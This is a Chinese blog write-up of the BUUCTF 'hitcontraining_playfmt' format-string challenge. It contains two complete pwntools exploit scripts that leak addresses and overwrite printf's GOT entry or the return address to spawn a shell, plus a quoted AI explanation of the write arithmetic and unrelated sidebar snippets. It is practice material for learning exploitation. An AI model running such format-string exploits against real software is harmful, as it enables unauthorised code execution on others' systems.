非栈上的格式化字符串漏洞(bss段)-playfmt

已于 2024-07-23 15:42:12 修改
阅读量836 收藏 19
点赞数 6
文章标签: 服务器 linux 运维 安全 网络 笔记
于 2024-07-22 00:00:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhuo1358/article/details/140595822
版权
方法一:修改printf为system,输入/bin/sh

这种方法会有点复杂

以buu上的hitcontraining_playfmt为例

没有开FULL RELRO,也就是说got表可改,那么我们的思路就是把printf的got表改成system,输入/bin/sh即可拿到shell

最终exp

from pwn import *


#r = remote("node5.buuoj.cn", 28773)
r = process("./playfmt")

elf = ELF("./playfmt")
libc = ELF('./libc-2.23.so')
printf_got = 0x0804A010
old_addr = 0x0804B080
# printf:0xf7d7b2d0 system:0xf7d67200
context.log_level = 'debug'
DEBUG = 0
'''if DEBUG:
    gdb.attach(r, 
    
    b *0x0804854F
    c
    )'''
#gdb.attach(r)
r.recvuntil("=====================\n")
r.recvuntil("=====================\n") #6 rbp 9 GOT 10 6->10
payload = "%6$p\n%15$p"
r.sendline(payload)
rbp = int(r.recvuntil('\n').strip(), 16) #泄露栈地址
success("rbp:"+hex(rbp))
start_main = int(r.recvuntil('\n').strip(), 16) - 247 #泄露libc地址
libc.address = start_main - libc.sym['__libc_start_main']
system = libc.sym['system']
success("libc:"+hex(libc.address))
print(hex(system))
raw_input()  #
got_addr = rbp - 4
num = got_addr & 0xFF
payload = '%' + str(num) + 'c%6$hhn' #把libc地址抓入栈
r.sendline(payload)

raw_input()
num = (printf_got)& 0xFF
payload = '%' + str(num) + 'c%10$hhn' #把printf_got抓入栈
r.sendline(payload)

raw_input()
got_addr = rbp - 8 - 4
num = got_addr&0xFF
payload = '%' + str(num) + 'c%6$hhn'
r.sendline(payload)

raw_input()
num = (printf_got+2) & 0xFFFF
payload = '%' + str(num) + 'c%10$hn'  #把printf_got+2抓入栈
r.sendline(payload) 

raw_input()
num1 = system&0xFFFF   #0x5678
num2 = (system>>16)-num1
print(hex(num1), ',', hex(num2))
payload ='%' + str(num1) + 'c%9$hn%' + str(num2) + 'c%7$hn'  #把printf_got改为system
r.sendline(payload)

'''raw_input()

payload='%' + str(num2) + 'c%7$hn'
r.sendline(payload)'''

raw_input()
payload = "/bin/sh"
r.sendline(payload)

r.interactive()
#pause()

 把libc地址抓进栈中

raw_input()  #
got_addr = rbp - 4
num = got_addr & 0xFF
payload = '%' + str(num) + 'c%6$hhn' #把libc地址抓入栈
r.sendline(payload)

 因为libc的地址只有低8位不同,通过写入低字节把printf_got抓到栈中

raw_input()
num = (printf_got)& 0xFF
payload = '%' + str(num) + 'c%10$hhn' #把printf_got抓入栈
r.sendline(payload)

把print_got+2抓入栈中(把print_got改成system要一半一半的改)

raw_input()
num = (printf_got+2) & 0xFFFF
payload = '%' + str(num) + 'c%10$hn'  #把printf_got+2抓入栈
r.sendline(payload)

 把printf_got改成system

raw_input()
num1 = system&0xFFFF   #0x5678
num2 = (system>>16)-num1
print(hex(num1), ',', hex(num2))
payload ='%' + str(num1) + 'c%9$hn%' + str(num2) + 'c%7$hn'  #把printf_got改为system
r.sendline(payload)

 这里num2为什么要减去num1,且看AI怎么说:

num2 是计算用来进行格式字符串漏洞利用时的一个重要部分。具体来说,num2 = (system >> 16) - num1 旨在算出在利用 printf 的格式字符串时需要写入的第二个16位数。

让我们逐步分析代码中为什么会有这样的操作:

  1. 狙击的目标: 该代码段的目标是将 system 的地址写入到某个特定的内存位置(例如 GOT 中的某个函数地址),使得在后续调用该函数时能够执行 system("/bin/sh"),从而获得一个 shell。

  2. 16位数分解: 在 x86 系统中,指针通常是 32 位的。如果我们想把一个 32 位的地址(例如 system 的地址)分成两个部分,即高 16 位和低 16 位:

    • num1 是 system 地址的低 16 位(通过 num = system & 0xFFFF 获取)。
    • num2 是 system 地址的高 16 位(通过 (system >> 16) - num1 计算得到)。

    这里的操作 (system >> 16) 将地址右移 16 位,从而取出高 16 位。然后通过减去 num1,我们得到需要加到低 16 位后面以达到完整地址的偏移量。

  3. 格式化字符串参数: 在格式字符串攻击中,%hn 写入 16 位的数值到一个指定的内存地址。因此,你需要两个写操作:

    • 第一次写操作用 num1(低 16 位)。
    • 第二次写操作则将 num2 写入到目标地址的高 16 位。

  4. 执行顺序: 在这种方式控制内存写入时,确保正确顺序非常重要,因为低 16 位和高 16 位分别会被修改,因此需要正确的偏移才能将 system 的完整地址写入目标位置。

总结起来,num2 的计算是通过右移和减去 num1 获取的为了将 system 地址的高 16 位正确写入目的地。这种技术是利用格式字符串漏洞进行精准内存操作的重要手段。

注意:这里因为是在play函数里面改的,系统已经会按照代码继续执行,所以改掉返回地址也没有关系,不要误认为是通过printf_got+2来执行的

方法二:修改返回地址为oneget来getshell

先放exp

from pwn import*
#io=process('./playfmt')
io=remote('node5.buuoj.cn','27461')
context(arch='i386',os='linux',log_level='debug')
libc=ELF('./libc-2.23.so')
def fmt(a):
	io.send(a)
#gdb.attach(io)
io.recvuntil("=====================\n")
io.recvuntil("=====================\n") #6 rbp 9 GOT 10 6->10
payload = "%6$p\n%15$p"
io.sendline(payload)
rbp = int(io.recvuntil('\n').strip(), 16) #泄露栈地址
success("rbp:"+hex(rbp))
start_main = int(io.recvuntil('\n').strip(), 16) - 247 #泄露libc地址
libc.address = start_main - libc.sym['__libc_start_main']
system = libc.sym['system']
success("libc:"+hex(libc.address))
print(hex(system))
one=p32(libc.address+0x3a80c)
ret=rbp-8-4
num=(rbp-12)&0xff
payload="%"+str(num)+"c%6$hhn\0"
fmt(payload)
for i in range(4):
	raw_input()
	payload="%"+str(num+i)+"c%6$hhn\0"
	fmt(payload)
	raw_input()
	payload="%"+str(one[i])+"c%10$hhn\0"
	fmt(payload)
fmt('quit')
io.interactive()
#pause()

gdb调试可以看到返回地址是play函数

如果我们能把它改成onegadget,我们就能getshell

可以看到已经更改

onegadget用工具在libc文件寻找

呀卡吗洗.
关注
  • 6
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
hitcontraining_playfmt 解题思路
Morphy_Amo的博客
03-19 715
格式化字符串
BUUCTF-PWN刷题记录-18(格式化字符串漏洞
weixin_44145820的博客
05-08 1724
目录xman_2019_format(字符串位于堆上)hitcontraining_playfmt字符串位于bss)wustctf2020_babyfmt xman_2019_format(字符串位于堆上) 一道格式化字符串题目,但是只有一次输入机会,但是有多次利用机会,每次利用使用‘|’隔开 我们先看一下栈的情况 经过多次调试,可以发现返回地址最低一个16进制位一定为0xC,我们只需要爆破倒数第二个16进制位就能得到指向返回地址的栈上地址 Exp: from pwn import * #r =
hitcontraining_playfmt
z1r0的博客
03-21 436
hitcontraining_playfmt 查看保护 格式 化漏洞,这个buf在bss上,也就是bss上的格式化漏洞。 攻击思路:可以执行shellcode,所以可以在bss上写入shellcode然后持劫ret_addr到shellcode的开头 既然不是栈上的所以需要借助ebp这个链子来完成 第六个位置是ebp第十个位置是ce78。 先将ce78里存放的ce88给改成ce6c,因为ce6c这里放着ret_addr(因为我们最后就是需要将ret_addr改成shellcode的头) 改完之后ce8
暑假集训——Hitcon_Trainning——lab9_playfmt——格式化字符串漏洞_字符串bss
qq_41667316的博客
07-13 736
格式化字符串漏洞 思路 一开始就是没有思路,太菜了,真的太菜了TAT。 这里的buf是在bss,也就是意味着没有办法用常规方法做。 看了大佬的wp才知道可以控制ebp来实现地址任意写。 但是我觉得或许用栈迁移也可以试一下。 先写一波控制ebp! 控制ebp 首先,格式化字符串漏洞的两个利用方式 泄露栈上内容 改写某地址内容(前提是这个地址要在栈上,也就是printf可控的地方) 原理...
BSS84-7-F-VB-MOSFET产品应用与参数解析
10-25
**BSS84-7-F MOSFET**是一款P沟道金属氧化物半导体场效应晶体管(MOSFET),适用于高侧切换应用。这款器件以其低导通电阻、低阈值电压和快速切换速度而著称。以下是该产品的详细特点和参数解析: **主要特点:** 1....
BSS138-NL-VB一款SOT23封装 MOSFET参数应用解析
10-09
**BSS138-NL MOSFET详解** BSS138-NL是一款由VBsemi生产的N沟道金属氧化物半导体场效应晶体管(MOSFET),它采用小型SOT23封装,适用于低电压、高速度的电子电路应用。这款MOSFET以其紧凑的尺寸、低阈值电压和快速...
BSS169-VB一种N沟道SOT23封装MOS管
最新发布
12-18
BSS169-VB N沟道SOT23封装MOS管 BSS169-VB是一种N沟道MOS管,封装在SOT23封装中。该MOS管具有TrenchFET Power MOSFET结构,100% Rg测试和100% UIS测试。该MOS管适用于DC/DC转换器、负载开关和LCD电视LED背光等应用...
masm.rar_字符串_汇编字符串
09-19
2. **字符串常量**:在汇编程序中,字符串常量通常通过数据(.DATA或.BSS)来定义,比如`DB 'Hello, World', 0`。 3. **字符串输入**:获取用户输入的字符串通常涉及键盘中断,如INT 21H或更复杂的系统调用,在...
cptr.rar_cptr_两字符串比较
09-14
数据是程序中预定义的常量和全局变量的存储区域,而附加(通常是BSS)则存放未初始化的全局变量和静态分配的内存。在这个程序中,"string1"和"string2"可能是存储在这两个中的两个字符串。 `cmpstr.asm`...
buuoj Pwn writeup 161-165
yongbaoii的博客
05-30 386
161 picoctf_2018_echooo 就是格式化字符串 flag被读到了栈上,直接泄露就行。 # -*- coding: utf-8 -*- from pwn import * context.log_level = "debug" r = remote('node3.buuoj.cn',25088) offset=11 flag='' for i in range(27,27+11): payload='%{}$p'.format(str(i)) r.sendlin
c语言格式化字符漏洞,格式化字符串漏洞题目练习
weixin_30111277的博客
05-22 906
整合一下最近做的格式化字符串题目的练习,把wp给写一下,方便对总结对这个漏洞的利用套路和技巧。inndy_echo保护和arch[*] '/media/psf/mypwn2/buuctf/inndy_echo/echo'Arch: i386-32-littleRELRO: Partial RELROStack: No canary foundNX: NX enabl...
BUUCTF pwn wp 146 - 150
fa1c4的blog
04-30 570
hitcontraining_playfmt gwctf_2019_easy_pwn bctf2016_bcloud asis2016_b00ks warmup
HITCON-Training-Writeup
baikeng3674的博客
03-14 568
HITCON-Training-Writeup 原文链接M4x@10.0.0.55 项目地址M4x's github,欢迎star~ 更新时间5月16 复习一下二进制基础,写写HITCON-Training的writeup,题目地址:https://github.com/scwuaptx/HITCON-Training Outline Basic Knowledge In...
BUUCTF-pwn刷题记录(22-7-30更新)
Morphy_Amo的博客
03-04 4316
BUUCTF刷题记录
HITCON-Training lab8(格式化字符串漏洞
像初雪一样自由洒落
03-28 333
还在补格式化字符串漏洞的知识,,,,看到这道题的时候,有点懵,,,因为发现218不会整,,,看官方writeup也不太行,,, 先知社区上有篇讲的就很好了,,,nice,用了四种方法(最后一种没看懂,,,),,,看完,BJDCTF那道r2t4终于也明白了,感天动地,,,今天就写下前三种方法的种种,,, 顺便计算下偏移,反正都会用到 偏移是7 方法一 最简单的...
暑假集训——Hitcon_Trainning——lab10_hacknote——堆UAF
qq_41667316的博客
07-13 278
漏洞-UAF 思路 本来就是打pwn苦手,搞堆真的更加难受[留下心酸泪水] 这道题做第二次了,寒假集训的时候也做了。但谁能想到,第二次做的时候仍旧是较为懵逼。 UAF 全称 use after free,是在free之后指针没有置NULL留下的漏洞。这就导致之前的指针还可以控制这块内存。 本题 这道题在ctfwiki上有详细解释。 这道题利用的是内存分配机制的fastbins。 fastbi...
buuctf magicheap
qq_42728977的博客
04-22 222
主要是unsorted bin 在拖链的时候的一些细节 参考
BSS169-VB:100V N沟道TrenchFET MOSFET技术规格
"BSS169-VB是一种N沟道SOT23...总结来说,BSS169-VB是一款高性能、小型化的N沟道MOSFET,适合于需要高效、低功耗和紧凑设计的电子设备中。其特性如TrenchFET技术和严格的测试标准,确保了在各种应用中的可靠性和效率。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值